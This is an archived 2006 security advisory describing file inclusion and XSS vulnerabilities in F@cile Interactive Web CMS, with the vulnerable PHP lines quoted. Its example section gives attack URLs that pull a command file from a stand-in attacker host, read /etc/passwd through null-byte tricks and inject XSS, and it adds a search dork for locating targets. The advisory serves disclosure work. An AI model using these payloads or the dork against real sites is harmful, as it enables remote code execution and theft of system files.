what you don't know can hurt you

InteractiveWeb-0.8.txt

InteractiveWeb-0.8.txt
Posted May 29, 2006
Site nukedx.com

F@cile Interactive Web versions less than or equal to 0.8x suffer from multiple file inclusion vulnerabilities.

tags | advisory, web, vulnerability, file inclusion
MD5 | bb6a5b5b4f61eecaaabcbf5bc6ae6da2

InteractiveWeb-0.8.txt

Change Mirror Download
--Security Report--
Advisory: F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:57 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: Facile (http://www.facile-web.it/)
Version: 0.8.5 and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary files to
Facile CMS.Parameter l
in p-popupgallery.php did not sanitized before using it.You can find
vulnerable code in p-popupgallery.php at line 28
-Source in p-popupgallery.php-
28: include ("$l/p-lang-base.php");
-End of source-
This can be caused to remote attacker include internal and external
files to p-popupgallery.php.
If magic_quotes_gpc off remote attacker can include internal files.
If allow_url_fopen on remote attacker can include external files.
This work regardless of any register_globals value.That vulnerability
is in 0.8.41 - 0.8.5
All other vulnerabilities works on version 0.8x..
There is another file inclusion vulnerabilities in p-editpage.php and
p-editbox.php.The parameter pathfile did not
sanitized properly.Remote attacker can include arbitrary local files
to these scripts.In php5 remote attacker also
include external resources too.This works with register_globals on.
Vulnerable codes in both files can be found at lines 20-21.
-Sources in both-
20: if(isset($pathfile) && is_file($pathfile)){
include("$pathfile");
-End of source-
There is another file inclusion vulnerabilities in themes.All themes
are vulnerable to include arbitrary local files.
This also be caused to XSS.Parameters mytheme and myskin did not
sanitized properly before using them.LFI works with
magic_quotes_gpc off.
Vulnerable files are:
p-themes/lowgraphic/index.inc.php
p-themes/classic/index.inc.php
p-themes/puzzle/index.inc.php
p-themes/simple/index.inc.php
p-themes/ciao/index.inc.php
Remote attacker also disclose local resources.The parameter lang in
index.php did not sanitized properly before using it.
This works with magic_quotes_gpc off.
Level: Highly Critical
---
How&Example:
GET -> http://[victim]/[FacilePath]/p-popupgallery.php?l=[FILE]
EXAMPLE ->
http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt?
EXAMPLE -> http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00
GET -> http://[victim]/[FacilePath]/p-editbox.php?pathfile=[FILE]
EXAMPLE -> http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
EXAMPLE ->
http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <-
php5
GET -> http://[victim]/[FacilePath]/p-editpage.php?pathfile=[FILE]
EXAMPLE -> http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd
EXAMPLE ->
http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <-
php5
GET ->
http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=[FILE]
EXAMPLE ->
http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=/etc/passwd%00
GET ->
http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=XSS&myskin=XSS
GET -> http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=[FILE]
EXAMPLE ->
http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
---
Exploit: http://www.nukedx.com/?getxpl=35
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=35
---
Dorks: "Powered by F@cile Interactive Web"



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    10 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close